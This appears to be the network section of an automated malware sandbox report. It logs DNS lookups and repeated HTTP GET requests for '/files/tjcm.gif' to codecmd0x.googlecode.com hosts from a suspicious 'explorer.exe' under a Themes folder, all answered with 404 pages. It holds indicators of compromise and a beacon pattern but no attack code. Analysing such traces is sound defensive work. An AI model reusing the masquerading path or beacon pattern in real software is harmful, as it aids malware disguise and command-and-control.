                                                                                                                                                                                Jul 16, 2022 23:58:16.371646881 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.398650885 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.398828030 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.399426937 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426215887 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426249981 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426268101 CEST8049881142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:16.426347971 CEST4988180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:16.426387072 CEST4988180192.168.2.5142.250.102.82
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                Jul 16, 2022 23:57:19.530715942 CEST6270453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:19.550043106 CEST53627048.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:19.970247030 CEST5393453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:19.989499092 CEST53539348.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:20.577889919 CEST6371253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:20.598897934 CEST53637128.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:21.983445883 CEST6065853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:22.012310982 CEST53606588.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.309936047 CEST5735253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:24.335664988 CEST53573528.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.697851896 CEST5233353192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:26.717003107 CEST53523338.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.779398918 CEST4940753192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:26.808068037 CEST53494078.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.516161919 CEST6264853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:27.540215015 CEST53626488.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.021388054 CEST6371853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:28.041414022 CEST53637188.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.230241060 CEST6358053192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:44.249377966 CEST53635808.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.227916002 CEST5678453192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:45.250171900 CEST53567848.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.785418987 CEST5955853192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:57:45.804655075 CEST53595588.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:24.959206104 CEST5375953192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:24.978725910 CEST53537598.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.372782946 CEST5928553192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:25.390219927 CEST53592858.8.8.8192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:25.826083899 CEST5726253192.168.2.58.8.8.8
                                                                                                                                                                                Jul 16, 2022 23:58:25.845954895 CEST53572628.8.8.8192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 16, 2022 23:57:19.530715942 CEST | 192.168.2.5 | 8.8.8.8 | 0x88b | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:19.970247030 CEST | 192.168.2.5 | 8.8.8.8 | 0xb157 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:20.577889919 CEST | 192.168.2.5 | 8.8.8.8 | 0x6b7b | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:21.983445883 CEST | 192.168.2.5 | 8.8.8.8 | 0xa848 | Standard query (0) | codecmd01.googlecode.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:24.309936047 CEST | 192.168.2.5 | 8.8.8.8 | 0x7b3c | Standard query (0) | codecmd02.googlecode.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:26.697851896 CEST | 192.168.2.5 | 8.8.8.8 | 0x5962 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:26.779398918 CEST | 192.168.2.5 | 8.8.8.8 | 0x433 | Standard query (0) | codecmd03.googlecode.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:27.516161919 CEST | 192.168.2.5 | 8.8.8.8 | 0xd62a | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:28.021388054 CEST | 192.168.2.5 | 8.8.8.8 | 0x2050 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:44.230241060 CEST | 192.168.2.5 | 8.8.8.8 | 0x2ef4 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:45.227916002 CEST | 192.168.2.5 | 8.8.8.8 | 0x2d25 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:45.785418987 CEST | 192.168.2.5 | 8.8.8.8 | 0xd638 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:24.959206104 CEST | 192.168.2.5 | 8.8.8.8 | 0x86c5 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:25.372782946 CEST | 192.168.2.5 | 8.8.8.8 | 0x84b8 | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:25.826083899 CEST | 192.168.2.5 | 8.8.8.8 | 0x970f | Standard query (0) | boot.net.anydesk.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 16, 2022 23:57:19.550043106 CEST | 8.8.8.8 | 192.168.2.5 | 0x88b | No error (0) | boot.net.anydesk.com | - | 185.229.191.39 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:19.989499092 CEST | 8.8.8.8 | 192.168.2.5 | 0xb157 | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:20.598897934 CEST | 8.8.8.8 | 192.168.2.5 | 0x6b7b | No error (0) | boot.net.anydesk.com | - | 92.223.88.41 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:22.012310982 CEST | 8.8.8.8 | 192.168.2.5 | 0xa848 | No error (0) | codecmd01.googlecode.com | googlecode.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 16, 2022 23:57:22.012310982 CEST | 8.8.8.8 | 192.168.2.5 | 0xa848 | No error (0) | googlecode.l.googleusercontent.com | - | 142.250.102.82 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:24.335664988 CEST | 8.8.8.8 | 192.168.2.5 | 0x7b3c | No error (0) | codecmd02.googlecode.com | googlecode.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 16, 2022 23:57:24.335664988 CEST | 8.8.8.8 | 192.168.2.5 | 0x7b3c | No error (0) | googlecode.l.googleusercontent.com | - | 142.250.102.82 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:26.717003107 CEST | 8.8.8.8 | 192.168.2.5 | 0x5962 | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:26.808068037 CEST | 8.8.8.8 | 192.168.2.5 | 0x433 | No error (0) | codecmd03.googlecode.com | googlecode.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001)
Jul 16, 2022 23:57:26.808068037 CEST | 8.8.8.8 | 192.168.2.5 | 0x433 | No error (0) | googlecode.l.googleusercontent.com | - | 142.250.102.82 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:27.540215015 CEST | 8.8.8.8 | 192.168.2.5 | 0xd62a | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:28.041414022 CEST | 8.8.8.8 | 192.168.2.5 | 0x2050 | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:44.249377966 CEST | 8.8.8.8 | 192.168.2.5 | 0x2ef4 | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:45.250171900 CEST | 8.8.8.8 | 192.168.2.5 | 0x2d25 | No error (0) | boot.net.anydesk.com | - | 92.223.88.41 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:57:45.804655075 CEST | 8.8.8.8 | 192.168.2.5 | 0xd638 | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:24.978725910 CEST | 8.8.8.8 | 192.168.2.5 | 0x86c5 | No error (0) | boot.net.anydesk.com | - | 49.12.130.237 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:25.390219927 CEST | 8.8.8.8 | 192.168.2.5 | 0x84b8 | No error (0) | boot.net.anydesk.com | - | 92.223.88.41 | A (IP address) | IN (0x0001)
Jul 16, 2022 23:58:25.845954895 CEST | 8.8.8.8 | 192.168.2.5 | 0x970f | No error (0) | boot.net.anydesk.com | - | 49.12.130.236 | A (IP address) | IN (0x0001)
                                                                                                                                                                                • codecmd01.googlecode.com
                                                                                                                                                                                • codecmd02.googlecode.com
                                                                                                                                                                                • codecmd03.googlecode.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49769 | 49.12.130.236 | 80 | C:\Users\user\Desktop\sj9q8uwmax.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49775 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:22.092885971 CEST | 1274 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Jul 16, 2022 23:57:22.120779037 CEST | 1276 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Sat, 16 Jul 2022 21:57:22 GMT


Session ID: 10
Source IP: 192.168.2.5
Source Port: 49857
Destination IP: 142.250.102.82
Destination Port: 80
Process: C:\Windows\Resources\Themes\explorer.exe

Timestamp: Jul 16, 2022 23:57:45.276844025 CEST
kBytes transferred: 2616
Direction: OUT
Data:
GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive

Timestamp: Jul 16, 2022 23:57:45.303518057 CEST
kBytes transferred: 2617
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:45 GMT


Session ID: 11
Source IP: 192.168.2.5
Source Port: 49858
Destination IP: 92.223.88.41
Destination Port: 80
Process: C:\Users\user\Desktop\sj9q8uwmax.exe

Timestamp  kBytes transferred  Direction  Data


Session ID: 12
Source IP: 192.168.2.5
Source Port: 49862
Destination IP: 142.250.102.82
Destination Port: 80
Process: C:\Windows\Resources\Themes\explorer.exe

Timestamp: Jul 16, 2022 23:57:46.730978966 CEST
kBytes transferred: 2640
Direction: OUT
Data:
GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive

Timestamp: Jul 16, 2022 23:57:46.758766890 CEST
kBytes transferred: 2642
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:46 GMT


Session ID: 13
Source IP: 192.168.2.5
Source Port: 49863
Destination IP: 142.250.102.82
Destination Port: 80
Process: C:\Windows\Resources\Themes\explorer.exe

Timestamp: Jul 16, 2022 23:57:48.095566988 CEST
kBytes transferred: 2643
Direction: OUT
Data:
GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive

Timestamp: Jul 16, 2022 23:57:48.122440100 CEST
kBytes transferred: 2644
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:48 GMT


Session ID: 14
Source IP: 192.168.2.5
Source Port: 49864
Destination IP: 142.250.102.82
Destination Port: 80
Process: C:\Windows\Resources\Themes\explorer.exe

Timestamp: Jul 16, 2022 23:57:49.525136948 CEST
kBytes transferred: 2646
Direction: OUT
Data:
GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive

Timestamp: Jul 16, 2022 23:57:49.551508904 CEST
kBytes transferred: 2647
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:49 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:49.551537991 CEST | 2647 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.5 | 49865 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:50.913546085 CEST | 2648 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:50.942166090 CEST | 2649 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:50 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:50.942202091 CEST | 2650 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.5 | 49866 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:53.439694881 CEST | 2651 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:53.466470003 CEST | 2652 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:53 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:53.466496944 CEST | 2653 | IN
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.5 | 49867 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:55.710952997 CEST | 2653 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:55.737890005 CEST | 2655 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:55 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:55.737912893 CEST | 2655 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.5 | 49868 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:58.168642998 CEST | 2656 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:58.197532892 CEST | 2657 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:58 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:58.197556973 CEST | 2658 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.5 | 49871 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:00.906277895 CEST | 2672 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:58:00.932934999 CEST | 2673 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:58:00 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:58:00.932960033 CEST | 2673 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49791 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:57:24.371624947 CEST | 1525 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jul 16, 2022 23:57:24.399090052 CEST | 1527 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Sat, 16 Jul 2022 21:57:24 GMT
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Jul 16, 2022 23:57:24.399126053 CEST | 1527 | IN |
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.5 | 49872 | 142.250.102.82 | 80 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 16, 2022 23:58:03.656693935 CEST | 2674 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
